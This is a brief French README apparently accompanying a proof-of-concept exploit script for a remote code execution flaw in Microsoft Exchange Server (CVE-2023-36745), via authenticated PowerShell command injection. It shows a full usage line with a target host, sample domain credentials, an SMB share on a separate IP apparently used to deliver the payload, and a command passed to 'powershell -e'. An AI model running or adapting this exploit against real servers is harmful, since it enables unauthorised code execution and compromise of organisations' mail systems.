
Preuve de concept d'exploitation pour la vulnérabilité RCE de Microsoft Exchange Server CVE-2023-36745, permettant l'exécution de code à distance via une injection de commandes PowerShell authentifiée.
Microsoft Exchange Server CVE-2023-36745 RCE PoC.
Exemple :
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
La commande sera transmise à powershell -e.